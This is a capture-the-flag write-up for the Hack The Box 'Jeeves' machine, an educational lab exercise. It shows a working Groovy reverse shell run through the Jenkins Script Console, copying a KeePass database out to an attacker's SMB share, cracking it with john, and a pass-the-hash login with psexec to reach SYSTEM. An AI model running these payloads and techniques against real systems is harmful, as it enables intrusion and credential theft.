Jeeves

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.63 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Sat Nov  5 12:46:41 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.051s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2

# Nmap done at Sat Nov  5 12:47:21 2022 -- 1 IP address (1 host up) scanned in 39.67 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80,135,445,50000 10.10.10.63 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Sat Nov  5 12:49:06 2022 as: nmap -sCV -p80,135,445,50000 -oN targeted 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.039s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-05T16:49:23
|_  start_date: 2022-11-05T16:45:35
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5h00m03s, deviation: 0s, median: 5h00m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov  5 12:49:56 2022 -- 1 IP address (1 host up) scanned in 50.03 seconds

The website on port 80 just shows a website which doesn't have much utility.

And the website on port 50000 shows a Jetty 9.4.z site.

If we enumerate subdirectories with gobuster on this last website, we'll find the /askjeeves directory.

gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error

dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.

===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.63:50000/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/06 22:03:07 Starting gobuster in directory enumeration mode
===============================================================
/askjeeves            (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]

===============================================================
2022/11/06 22:03:48 Finished
===============================================================

Exploitation

In the /askjeeves directory, we'll find a Jenkins server.

In a Jenkins server, when we are able to see the Manage Jenkins section, we can run commands on the system via the Script Console section.

All we have to do is set a netcat listener on port 4444 with rlwrap.

rlwrap nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

And run the following command, which will send a reverse shell to our netcat listener.

String host="10.10.14.6";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Once we get the shell, we could be able to grab the user flag.

Listening on 0.0.0.0 4444
Connection received on 10.10.10.63 49677
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>whoami
jeeves\kohsuke

C:\Users\Administrator\.jenkins>type \users\kohsuke\desktop\user.txt
e3232272596fb47950d59c4cf1e7066a

Privilege Escalation

Inside the kohsuke documents directory we'll see a CEH.kdbx file.

dir \users\kohsuke\documents

dir \users\kohsuke\documents
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\users\kohsuke\documents

11/03/2017  10:18 PM    <DIR>          .
11/03/2017  10:18 PM    <DIR>          ..
09/18/2017  12:43 PM             2,846 CEH.kdbx
               1 File(s)          2,846 bytes
               2 Dir(s)   2,664,460,288 bytes free

The .cdbx files are used by KeePass, and usually contains usernames and passwords.

KeePass is a password manager that allows you to securely protect different passwords, officially supports MacOS and Linux operating systems through the use of Mono.

Let's transfer that file to our machine. First create a SMB share in the current directory.

impacket-smbserver smbFolder $(pwd) -smb2support

Then copy the file to the SMB share.

copy \users\kohsuke\documents\CEH.kdbx \10.10.14.6\smbFolder\

As these type of files are encrypted with a password, we'll have to break it. First, get the hash of the file with keepass2john and put it in the hash file.

keepass2john CEH.kdbx > hash

Now, break the hash with john.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)     
1g 0:00:03:21 DONE (2022-11-06 22:34) 0.004956g/s 272.5p/s 272.5c/s 272.5C/s mwuah..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now that we know the password, we can open the CEH.kdbx file.

keepassxc CEH.kdbx

Inside the Backup stuff entry, we'll see that the password is an NTLM hash.

Which seems to be the NTLM hash of the administrator user.

cme smb 10.10.10.63 -u "administrator" -H e0fb1fb85756c24235ff238cbe81fe00

SMB         10.10.10.63     445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB         10.10.10.63     445    JEEVES           [+] Jeeves\administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)

As we have the NTLM hash of the administrator user, we don't need his password to get a shell, we could do a Pass The Hash attack to get the shell.

psexec.py administrator@10.10.10.63 -hashes :e0fb1fb85756c24235ff238cbe81fe00

Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file glmGVnZp.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service dMpa on 10.10.10.63.....
[*] Starting service dMpa.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

At this point, we could get the root flag, but there is another file called hm.txt file instead of the root flag in the administrator's desktop.

dir \users\administrator\desktop

 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\users\administrator\desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,663,813,120 bytes free

The file says to look deeper.

type \users\administrator\desktop\hm.txt

The flag is elsewhere.  Look deeper.

If we go to the desktop and try to list the alternative data streams, we'll see one called hm.txt:root.txt.

Alternate Data Streams have the ability of forking data into an existing file without changing its file size or functionality.

Finally, all we have to do is get the content of the alternative data stream, and reap the harvest and take the root flag.

more < hm.txt:root.txt

afbc5bd4b615a60648cec41c6ac92530

Last updated 2 years ago

Was this helpful?